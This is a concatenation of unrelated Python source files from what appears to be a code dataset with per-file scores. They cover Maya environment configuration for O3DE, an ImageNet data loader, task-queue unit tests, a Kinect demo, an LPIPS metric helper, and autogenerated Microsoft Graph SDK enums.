DCCSI_MAYABATCH_EXE = Path(MAYA_BIN_PATH, 'mayabatch.exe')
DCCSI_PY_MAYA = Path(MAYA_BIN_PATH, 'mayapy.exe')
# this is transient and will always track the exe this script is executing on
O3DE_PY_EXE = Path(sys.executable).as_posix()
DCCSI_PY_IDE = Path(DCCSI_PY_MAYA).as_posix()
DCCSI_MAYA_PLUG_IN_PATH = Path(PATH_DCCSI_TOOLS_MAYA,'plugins').as_posix()
# is a maya envar
MAYA_PLUG_IN_PATH = Path(DCCSI_MAYA_PLUG_IN_PATH).as_posix() # extend %MAYA_PLUG_IN_PATH%
# to do: remove or extend next PR, technically there can be more then one plugin path
#while MAYA_PLUG_IN_PATH:
#if ENVAR_MAYA_PLUG_IN_PATH in os.environ:
#maya_plug_pathlist = os.getenv(ENVAR_MAYA_PLUG_IN_PATH).split(os.pathsep)
#maya_plug_new_pathlist = maya_plug_pathlist.copy()
#maya_plug_new_pathlist.insert(0, Path(DCCSI_MAYA_PLUG_IN_PATH).as_posix())
#os.environ[ENVAR_MAYA_PLUG_IN_PATH] = os.pathsep.join(maya_plug_new_pathlist)
#else:
#os.environ[ENVAR_MAYA_PLUG_IN_PATH] = DCCSI_MAYA_PLUG_IN_PATH
#MAYA_PLUG_IN_PATH = os.getenv(ENVAR_MAYA_PLUG_IN_PATH, "< NOT SET >")
#break
DCCSI_MAYA_SHELF_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Prefs', 'Shelves').as_posix()
DCCSI_MAYA_XBMLANGPATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Prefs', 'icons').as_posix()
# is a maya envar
# maya resources, very oddly named
XBMLANGPATH = Path(DCCSI_MAYA_XBMLANGPATH).as_posix() # extend %XBMLANGPATH%
# to do: remove or extend next PR, technically there can be more then one resource path specified
#while XBMLANGPATH:
#if ENVAR_XBMLANGPATH in os.environ:
#maya_xbm_pathlist = os.getenv(ENVAR_XBMLANGPATH).split(os.pathsep)
#maya_xbm_new_pathlist = maya_xbm_pathlist.copy()
#maya_xbm_new_pathlist.insert(0, Path(DCCSI_MAYA_XBMLANGPATH).as_posix())
#os.environ[ENVAR_XBMLANGPATH] = os.pathsep.join(maya_xbm_new_pathlist)
#else:
#os.environ[ENVAR_XBMLANGPATH] = DCCSI_MAYA_XBMLANGPATH
#XBMLANGPATH = os.getenv(ENVAR_XBMLANGPATH, "< NOT SET >")
#break
DCCSI_MAYA_SCRIPT_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Scripts').as_posix()
DCCSI_MAYA_SCRIPT_MEL_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Scripts', 'Mel').as_posix()
DCCSI_MAYA_SCRIPT_PY_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Scripts', 'Python').as_posix()
MAYA_SCRIPT_PATH = Path(DCCSI_MAYA_SCRIPT_PATH).as_posix() # extend %MAYA_SCRIPT_PATH%
# to do: remove or extend next PR, technically there can be more then one script path specified
#while MAYA_SCRIPT_PATH:
#if ENVAR_MAYA_SCRIPT_PATH in os.environ:
#maya_script_pathlist = os.getenv(ENVAR_MAYA_SCRIPT_PATH).split(os.pathsep)
#maya_script_new_pathlist = maya_script_pathlist.copy()
#maya_script_new_pathlist.insert(0, DCCSI_MAYA_SCRIPT_MEL_PATH)
#maya_script_new_pathlist.insert(0, DCCSI_MAYA_SCRIPT_PY_PATH)
#maya_script_new_pathlist.insert(0, DCCSI_MAYA_SCRIPT_PATH)
#os.environ[ENVAR_MAYA_SCRIPT_PATH] = os.pathsep.join(maya_script_new_pathlist)
#else:
#os.environ[ENVAR_MAYA_SCRIPT_PATH] = os.pathsep.join( (DCCSI_MAYA_SCRIPT_PATH,
#DCCSI_MAYA_SCRIPT_PY_PATH,
#DCCSI_MAYA_SCRIPT_MEL_PATH) )
#MAYA_SCRIPT_PATH = os.getenv(ENVAR_MAYA_SCRIPT_PATH, "< NOT SET >")
#break
# is a maya envar
MAYA_VP2_DEVICE_OVERRIDE="VirtualDeviceDx11"
MAYA_OGS_DEVICE_OVERRIDE="VirtualDeviceDx11"
DCCSI_MAYA_WIKI_URL = 'https://github.com/o3de/o3de/wiki/O3DE-DCCsi-Tools-DCC-Maya'
# reference, here is a list of Maya envars
# https://github.com/mottosso/Maya-Environment-Variables/blob/master/README.md
# -------------------------------------------------------------------------
###########################################################################
# Main Code Block, runs this script as main (testing)
# -------------------------------------------------------------------------
if __name__ == '__main__':
"""Run this file as a standalone script"""
# happy print
_LOGGER.info(STR_CROSSBAR)
_LOGGER.info('~ {}.py ... Running script as __main__'.format(_MODULENAME))
_LOGGER.info(STR_CROSSBAR)
# global debug stuff
_DCCSI_GDEBUG = env_bool(ENVAR_DCCSI_GDEBUG, True)
_DCCSI_DEV_MODE = env_bool(ENVAR_DCCSI_DEV_MODE, True)
_DCCSI_LOGLEVEL = int(env_bool(ENVAR_DCCSI_LOGLEVEL, _logging.INFO))
if _DCCSI_GDEBUG:
# override loglevel if runnign debug
_DCCSI_LOGLEVEL = _logging.DEBUG
# configure basic logger
# note: not using a common logger to reduce cyclical imports
_logging.basicConfig(level=_DCCSI_LOGLEVEL,
format=FRMT_LOG_LONG,
datefmt='%m-%d %H:%M')
# re-configure basic logger for debug
_LOGGER = _logging.getLogger(_MODULENAME)
# this is just a debug developer convenience print (for testing acess)
import pkgutil
_LOGGER.info('Current working dir: {0}'.format(os.getcwd()))
search_path = ['.'] # set to None to see all modules importable from sys.path
all_modules = [x[1] for x in pkgutil.iter_modules(path=search_path)]
_LOGGER.info('All Available Modules in working dir: {0}'.format(all_modules))
# override based on current executable
PATH_DCCSI_PYTHON_LIB = STR_PATH_DCCSI_PYTHON_LIB.format(_PATH_DCCSIG,
sys.version_info.major,
sys.version_info.minor)
PATH_DCCSI_PYTHON_LIB = Path(PATH_DCCSI_PYTHON_LIB).as_posix()
# test anything procedurally generated
_LOGGER.info('Testing procedural env paths ...')
from pathlib import Path
_stash_dict = {}
_stash_dict['O3DE_DEV'] = Path(PATH_O3DE_DEV)
_stash_dict['PATH_DCCSIG'] = Path(PATH_DCCSIG)
_stash_dict['DCCSI_AZPY_PATH'] = Path(PATH_DCCSI_AZPY_PATH)
_stash_dict['PATH_DCCSI_TOOLS'] = Path(PATH_DCCSI_TOOLS)
_stash_dict['PATH_DCCSI_PYTHON_LIB'] = Path(PATH_DCCSI_PYTHON_LIB)
_stash_dict['PATH_DCCSI_TOOLS_MAYA'] = Path(PATH_DCCSI_TOOLS_MAYA)
_stash_dict['MAYA_LOCATION'] = Path(MAYA_LOCATION)
_stash_dict['DCCSI_MAYA_EXE'] = Path(DCCSI_MAYA_EXE)
_stash_dict['DCCSI_PY_MAYA'] = Path(DCCSI_PY_MAYA)
_stash_dict['MAYA_SCRIPT_PATH'] = Path(MAYA_SCRIPT_PATH)
# ---------------------------------------------------------------------
# py 2 and 3 compatible iter
def get_items(dict_object):
for key in dict_object:
yield key, dict_object[key]
for key, value in get_items(_stash_dict):
# check if path exists
try:
value.exists()
_LOGGER.info('{0}: {1}'.format(key, value))
except Exception as e:
_LOGGER.warning('FAILED PATH: {}'.format(e))
# custom prompt
sys.ps1 = "[{}]>>".format(_MODULENAME)
_LOGGER.debug('{0} took: {1} sec'.format(_MODULENAME, timeit.default_timer() - _START))
# --- END -----------------------------------------------------------------
| 1.734375 | 2 |
lib/data/finetune_imagenet.py | liqi17thu/Stand-Alone-Self-Attention | 1 | 17645 | <reponame>liqi17thu/Stand-Alone-Self-Attention
import torch
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from lib.data.data_util import ImageNetPolicy, ToBGRTensor
from lib.config import cfg
from lib.data.transformer_v2 import get_transforms
def finetune_imagenet():
transformation = get_transforms(input_size=cfg.dataset.finetune_size, test_size=cfg.dataset.finetune_size,
kind='full', crop=True, need=('train', 'val'), backbone=None)
transform_train = transformation['val_train']
transform_test = transformation['val_test']
train_data = datasets.ImageFolder(
cfg.dataset.train_dir,
transform_train
)
test_data = datasets.ImageFolder(
cfg.dataset.test_dir,
transform_test
)
if cfg.ddp.distributed:
train_sampler = torch.utils.data.distributed.DistributedSampler(train_data)
test_sampler = torch.utils.data.distributed.DistributedSampler(test_data)
else:
train_sampler = None
test_sampler = None
if cfg.ddp.distributed:
train_loader = torch.utils.data.DataLoader(
train_data, batch_size=cfg.dataset.batch_size,
sampler=train_sampler,
pin_memory=True, num_workers=cfg.dataset.workers)
test_loader = torch.utils.data.DataLoader(
test_data, batch_size=cfg.dataset.batch_size,
sampler=test_sampler,
pin_memory=True, num_workers=cfg.dataset.workers)
else:
train_loader = torch.utils.data.DataLoader(
train_data, batch_size=cfg.dataset.batch_size,
shuffle=True,
pin_memory=True, num_workers=cfg.dataset.workers)
test_loader = torch.utils.data.DataLoader(
test_data, batch_size=cfg.dataset.batch_size,
shuffle=False,
pin_memory=True, num_workers=cfg.dataset.workers)
return [train_loader, test_loader], [train_sampler, test_sampler], 1000
| 2.25 | 2 |
test/acceptance/test_kamma.py | marceljanerfont/kamma | 1 | 17646 | # -*- encoding: utf-8 -*-
try:
import unittest2 as unittest
except ImportError:
import unittest
from multiprocessing import Manager
from random import randint
import logging
import sys
import os
import copy
import shutil
# add kamma path
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..')))
import kamma
TEST_PATH = "test_queue"
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)-8s] [%(name)-10s] [%(lineno)-4d] %(message)s'))
logger_kamma = logging.getLogger('kamma.app')
logger_kamma.handlers = [handler]
# logger_kamma.setLevel(logging.DEBUG)
logger_fqueue = logging.getLogger('kamma.queue')
logger_fqueue.handlers = [handler]
# logger_fqueue.setLevel(logging.DEBUG)
logger_task = logging.getLogger('kamma.task')
logger_task.handlers = [handler]
# logger_task.setLevel(logging.DEBUG)
logger = logging.getLogger('test')
logger.handlers = [handler]
logger.setLevel(logging.DEBUG)
def _clear_queue():
try:
shutil.rmtree(TEST_PATH)
except Exception:
pass
# it should be out of the class scope, otherwise
# python tries to pickle all class and its manager and then
# the serialization will fail
the_manager = None
class KammaTestsCheckOrder(unittest.TestCase):
def setUp(self):
_clear_queue()
self.callbacks = [self.task0, self.task1, self.task2, self.task3, self.task4, self.task5]
# Manager is necessary because it is modified from different threads
the_manager = Manager()
self.cb_indexs = the_manager.list()
for i in range(0, 100):
self.cb_indexs.append(randint(0, 5))
def tearDown(self):
_clear_queue()
def _taskx(self, task_id, data):
logger.debug("running '{}', remaining {} tasks".format(task_id, len(self.cb_indexs)))
self.assertEqual(task_id, data['id'], "{} data: {}, tasks: {}".format(task_id, data, self.cb_indexs))
self.assertEqual(task_id, self.callbacks[self.cb_indexs[0]].__name__)
self.cb_indexs.pop(0)
def task0(self, data):
self._taskx('task0', data)
def task1(self, data):
self._taskx('task1', data)
def task2(self, data):
self._taskx('task2', data)
def task3(self, data):
self._taskx('task3', data)
def task4(self, data):
self._taskx('task4', data)
def task5(self, data):
self._taskx('task5', data)
def test_usual_case(self):
worker = kamma.Worker(queue_path=TEST_PATH)
worker.add_task_callback(callback=self.task0, retry_wait=kamma.wait_fixed(0), retry_stop=kamma.stop_after_attempt(1))
worker.add_task_callback(callback=self.task1, retry_wait=kamma.wait_fixed(0), retry_stop=kamma.stop_after_attempt(1))
worker.add_task_callback(callback=self.task2, retry_wait=kamma.wait_fixed(0), retry_stop=kamma.stop_after_attempt(1))
worker.add_task_callback(callback=self.task3, retry_wait=kamma.wait_fixed(0), retry_stop=kamma.stop_after_attempt(1))
worker.add_task_callback(callback=self.task4, retry_wait=kamma.wait_fixed(0), retry_stop=kamma.stop_after_attempt(1))
worker.add_task_callback(callback=self.task5, retry_wait=kamma.wait_fixed(0), retry_stop=kamma.stop_after_attempt(1))
cloned_cb_indexs = copy.deepcopy(self.cb_indexs)
worker.run_async()
for i in cloned_cb_indexs:
worker.push_task(callback=self.callbacks[i], data={'id': self.callbacks[i].__name__})
worker.wait_empty_event()
self.assertEqual(0, worker.pending())
worker.stop()
self.assertEqual(0, len(self.cb_indexs))
class KammaTestsExceptionsInKamma(unittest.TestCase):
def setUp(self):
_clear_queue()
def tearDown(self):
_clear_queue()
def task(self):
pass
def test_exception_pushtask_TaskNotRegistered(self):
worker = kamma.Worker(queue_path=TEST_PATH)
self.assertRaises(kamma.TaskNotRegistered, lambda: worker.push_task(callback=self.task))
# worker.wait()
worker.stop()
class KammaTestsExceptionsInTask(unittest.TestCase):
def setUp(self):
_clear_queue()
the_manager = Manager()
self.count = the_manager.list()
self.count.append(0)
self.num_failures = 3
def tearDown(self):
_clear_queue()
def task0(self):
self.count[0] = self.count[0] + 1
if self.count[0] < self.num_failures:
raise Exception('I don\'t want to work, try {}'.format(self.count[0]))
def test_exception_in_task(self):
worker = kamma.Worker(queue_path=TEST_PATH)
worker.add_task_callback(callback=self.task0, retry_wait=kamma.wait_fixed(0), retry_stop=kamma.stop_after_attempt(self.num_failures+1))
worker.push_task(callback=self.task0)
worker.run_async()
worker.wait_empty_event()
worker.stop()
self.assertEqual(self.num_failures, self.count[0])
class KammaTestsOnAbortion(unittest.TestCase):
def setUp(self):
_clear_queue()
self.abortion_called = False
self.failure_called = False
def tearDown(self):
_clear_queue()
def task_abort(self):
raise kamma.AbortTask("I'm indisposed")
def task_failure(self):
raise Exception("Boom")
def on_abortion(self, json_task, reason):
self.abortion_called = True
def on_failure(self, json_task, retry_stopped):
self.failure_called = True
def test_on_abortion(self):
worker = kamma.Worker(queue_path=TEST_PATH)
worker.add_on_abortion(self.on_abortion)
worker.add_task_callback(self.task_abort)
worker.run_async()
worker.push_task(self.task_abort)
worker.wait_empty_event()
worker.stop()
self.assertTrue(self.abortion_called)
def test_on_failure(self):
worker = kamma.Worker(queue_path=TEST_PATH)
worker.add_on_failure(self.on_failure)
worker.add_task_callback(self.task_failure, retry_wait=kamma.wait_fixed(0), retry_stop=kamma.stop_after_attempt(1))
worker.run_async()
worker.push_task(self.task_failure)
worker.wait_empty_event()
worker.stop()
self.assertTrue(self.failure_called)
if __name__ == '__main__':
unittest.main()
| 2.265625 | 2 |
wrappers/python/demo_mp_sync.py | Qworg/libfreenect | 10 | 17647 | <reponame>Qworg/libfreenect<gh_stars>1-10
#!/usr/bin/env python
import freenect
import matplotlib.pyplot as mp
import frame_convert
import signal
keep_running = True
def get_depth():
return frame_convert.pretty_depth(freenect.sync_get_depth()[0])
def get_video():
return freenect.sync_get_video()[0]
def handler(signum, frame):
"""Sets up the kill handler, catches SIGINT"""
global keep_running
keep_running = False
mp.ion()
mp.gray()
mp.figure(1)
image_depth = mp.imshow(get_depth(), interpolation='nearest', animated=True)
mp.figure(2)
image_rgb = mp.imshow(get_video(), interpolation='nearest', animated=True)
print('Press Ctrl-C in terminal to stop')
signal.signal(signal.SIGINT, handler)
while keep_running:
mp.figure(1)
image_depth.set_data(get_depth())
mp.figure(2)
image_rgb.set_data(get_video())
mp.draw()
mp.waitforbuttonpress(0.01)
| 2.265625 | 2 |
codes/models/modules/LPIPS/compute_dists.py | DinJerr/BasicSR | 5 | 17648 | <filename>codes/models/modules/LPIPS/compute_dists.py
#import models
from models.modules.LPIPS import perceptual_loss as models
####################
# metric
####################
model = None
def calculate_lpips(img1_im, img2_im, use_gpu=False, net='squeeze', spatial=False):
'''calculate Perceptual Metric using LPIPS
img1_im, img2_im: BGR image from [0,255]
img1, img2: BGR image from [-1,1]
'''
global model
## Initializing the model
# squeeze is much smaller, needs less RAM to load and execute in CPU during training
if model is None:
model = models.PerceptualLoss(model='net-lin',net=net,use_gpu=use_gpu,spatial=spatial)
# Load images to tensors
img1 = models.im2tensor(img1_im[:,:,::-1]) # RGB image from [-1,1]
img2 = models.im2tensor(img2_im[:,:,::-1]) # RGB image from [-1,1]
if(use_gpu):
img1 = img1.cuda()
img2 = img2.cuda()
# Compute distance
if spatial==False:
dist01 = model.forward(img2,img1)
else:
dist01 = model.forward(img2,img1).mean() # Add .mean, if using add spatial=True
#print('Distance: %.3f'%dist01) #%.8f
return dist01
def cleanup():
global model
model = None
| 2.171875 | 2 |
msgraph-cli-extensions/v1_0/sites_v1_0/azext_sites_v1_0/vendored_sdks/sites/models/_sites_enums.py | thewahome/msgraph-cli | 0 | 17649 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class _CaseInsensitiveEnumMeta(EnumMeta):
def __getitem__(self, name):
return super().__getitem__(name.upper())
def __getattr__(cls, name):
"""Return the enum member matching `name`
We use __getattr__ instead of descriptors or inserting into the enum
class' __dict__ in order to support `name` and `value` being both
properties for enum members (which live in the class' __dict__) and
enum members themselves.
"""
try:
return cls._member_map_[name.upper()]
except KeyError:
raise AttributeError(name)
class Enum100(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
DESCRIPTION = "description"
GROUP = "group"
HIDDEN = "hidden"
INHERITED_FROM = "inheritedFrom"
NAME = "name"
ORDER = "order"
PARENT_ID = "parentId"
READ_ONLY = "readOnly"
SEALED = "sealed"
COLUMN_LINKS = "columnLinks"
class Enum101(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
COLUMN_LINKS = "columnLinks"
class Enum102(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
NAME = "name"
NAME_DESC = "name desc"
class Enum103(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
NAME = "name"
class Enum104(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
NAME = "name"
class Enum105(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DRIVE_TYPE = "driveType"
OWNER = "owner"
QUOTA = "quota"
SHARE_POINT_IDS = "sharePointIds"
SYSTEM = "system"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
FOLLOWING = "following"
ITEMS = "items"
LIST = "list"
ROOT = "root"
SPECIAL = "special"
class Enum106(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
FOLLOWING = "following"
ITEMS = "items"
LIST = "list"
ROOT = "root"
SPECIAL = "special"
class Enum107(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
CREATED_BY = "createdBy"
CREATED_BY_DESC = "createdBy desc"
CREATED_DATE_TIME = "createdDateTime"
CREATED_DATE_TIME_DESC = "createdDateTime desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
E_TAG = "eTag"
E_TAG_DESC = "eTag desc"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
NAME = "name"
NAME_DESC = "name desc"
PARENT_REFERENCE = "parentReference"
PARENT_REFERENCE_DESC = "parentReference desc"
WEB_URL = "webUrl"
WEB_URL_DESC = "webUrl desc"
CONTENT_TYPE = "contentType"
CONTENT_TYPE_DESC = "contentType desc"
SHAREPOINT_IDS = "sharepointIds"
SHAREPOINT_IDS_DESC = "sharepointIds desc"
class Enum108(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
CONTENT_TYPE = "contentType"
SHAREPOINT_IDS = "sharepointIds"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
DRIVE_ITEM = "driveItem"
FIELDS = "fields"
VERSIONS = "versions"
class Enum109(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
DRIVE_ITEM = "driveItem"
FIELDS = "fields"
VERSIONS = "versions"
class Enum110(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
CONTENT_TYPE = "contentType"
SHAREPOINT_IDS = "sharepointIds"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
DRIVE_ITEM = "driveItem"
FIELDS = "fields"
VERSIONS = "versions"
class Enum111(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
DRIVE_ITEM = "driveItem"
FIELDS = "fields"
VERSIONS = "versions"
class Enum112(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ALL_TIME = "allTime"
ITEM_ACTIVITY_STATS = "itemActivityStats"
LAST_SEVEN_DAYS = "lastSevenDays"
class Enum113(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
ALL_TIME = "allTime"
ITEM_ACTIVITY_STATS = "itemActivityStats"
LAST_SEVEN_DAYS = "lastSevenDays"
class Enum114(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
AUDIO = "audio"
CONTENT = "content"
C_TAG = "cTag"
DELETED = "deleted"
FILE = "file"
FILE_SYSTEM_INFO = "fileSystemInfo"
FOLDER = "folder"
IMAGE = "image"
LOCATION = "location"
PACKAGE = "package"
PENDING_OPERATIONS = "pendingOperations"
PHOTO = "photo"
PUBLICATION = "publication"
REMOTE_ITEM = "remoteItem"
ROOT = "root"
SEARCH_RESULT = "searchResult"
SHARED = "shared"
SHAREPOINT_IDS = "sharepointIds"
SIZE = "size"
SPECIAL_FOLDER = "specialFolder"
VIDEO = "video"
WEB_DAV_URL = "webDavUrl"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
WORKBOOK = "workbook"
ANALYTICS = "analytics"
CHILDREN = "children"
LIST_ITEM = "listItem"
PERMISSIONS = "permissions"
SUBSCRIPTIONS = "subscriptions"
THUMBNAILS = "thumbnails"
VERSIONS = "versions"
class Enum115(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
WORKBOOK = "workbook"
ANALYTICS = "analytics"
CHILDREN = "children"
LIST_ITEM = "listItem"
PERMISSIONS = "permissions"
SUBSCRIPTIONS = "subscriptions"
THUMBNAILS = "thumbnails"
VERSIONS = "versions"
class Enum116(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
PUBLICATION = "publication"
PUBLICATION_DESC = "publication desc"
class Enum117(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
PUBLICATION = "publication"
FIELDS = "fields"
class Enum118(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
FIELDS = "fields"
class Enum119(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
PUBLICATION = "publication"
FIELDS = "fields"
class Enum120(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
FIELDS = "fields"
class Enum121(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
APPLICATION_ID = "applicationId"
APPLICATION_ID_DESC = "applicationId desc"
CHANGE_TYPE = "changeType"
CHANGE_TYPE_DESC = "changeType desc"
CLIENT_STATE = "clientState"
CLIENT_STATE_DESC = "clientState desc"
CREATOR_ID = "creatorId"
CREATOR_ID_DESC = "creatorId desc"
ENCRYPTION_CERTIFICATE = "encryptionCertificate"
ENCRYPTION_CERTIFICATE_DESC = "encryptionCertificate desc"
ENCRYPTION_CERTIFICATE_ID = "encryptionCertificateId"
ENCRYPTION_CERTIFICATE_ID_DESC = "encryptionCertificateId desc"
EXPIRATION_DATE_TIME = "expirationDateTime"
EXPIRATION_DATE_TIME_DESC = "expirationDateTime desc"
INCLUDE_RESOURCE_DATA = "includeResourceData"
INCLUDE_RESOURCE_DATA_DESC = "includeResourceData desc"
LATEST_SUPPORTED_TLS_VERSION = "latestSupportedTlsVersion"
LATEST_SUPPORTED_TLS_VERSION_DESC = "latestSupportedTlsVersion desc"
LIFECYCLE_NOTIFICATION_URL = "lifecycleNotificationUrl"
LIFECYCLE_NOTIFICATION_URL_DESC = "lifecycleNotificationUrl desc"
NOTIFICATION_URL = "notificationUrl"
NOTIFICATION_URL_DESC = "notificationUrl desc"
RESOURCE = "resource"
RESOURCE_DESC = "resource desc"
class Enum122(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
APPLICATION_ID = "applicationId"
CHANGE_TYPE = "changeType"
CLIENT_STATE = "clientState"
CREATOR_ID = "creatorId"
ENCRYPTION_CERTIFICATE = "encryptionCertificate"
ENCRYPTION_CERTIFICATE_ID = "encryptionCertificateId"
EXPIRATION_DATE_TIME = "expirationDateTime"
INCLUDE_RESOURCE_DATA = "includeResourceData"
LATEST_SUPPORTED_TLS_VERSION = "latestSupportedTlsVersion"
LIFECYCLE_NOTIFICATION_URL = "lifecycleNotificationUrl"
NOTIFICATION_URL = "notificationUrl"
RESOURCE = "resource"
class Enum123(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
APPLICATION_ID = "applicationId"
CHANGE_TYPE = "changeType"
CLIENT_STATE = "clientState"
CREATOR_ID = "creatorId"
ENCRYPTION_CERTIFICATE = "encryptionCertificate"
ENCRYPTION_CERTIFICATE_ID = "encryptionCertificateId"
EXPIRATION_DATE_TIME = "expirationDateTime"
INCLUDE_RESOURCE_DATA = "includeResourceData"
LATEST_SUPPORTED_TLS_VERSION = "latestSupportedTlsVersion"
LIFECYCLE_NOTIFICATION_URL = "lifecycleNotificationUrl"
NOTIFICATION_URL = "notificationUrl"
RESOURCE = "resource"
class Enum127(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
CREATED_BY = "createdBy"
CREATED_BY_DESC = "createdBy desc"
CREATED_DATE_TIME = "createdDateTime"
CREATED_DATE_TIME_DESC = "createdDateTime desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
E_TAG = "eTag"
E_TAG_DESC = "eTag desc"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
NAME = "name"
NAME_DESC = "name desc"
PARENT_REFERENCE = "parentReference"
PARENT_REFERENCE_DESC = "parentReference desc"
WEB_URL = "webUrl"
WEB_URL_DESC = "webUrl desc"
DISPLAY_NAME = "displayName"
DISPLAY_NAME_DESC = "displayName desc"
ERROR = "error"
ERROR_DESC = "error desc"
ROOT = "root"
ROOT_DESC = "root desc"
SHAREPOINT_IDS = "sharepointIds"
SHAREPOINT_IDS_DESC = "sharepointIds desc"
SITE_COLLECTION = "siteCollection"
SITE_COLLECTION_DESC = "siteCollection desc"
class Enum128(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DISPLAY_NAME = "displayName"
ERROR = "error"
ROOT = "root"
SHAREPOINT_IDS = "sharepointIds"
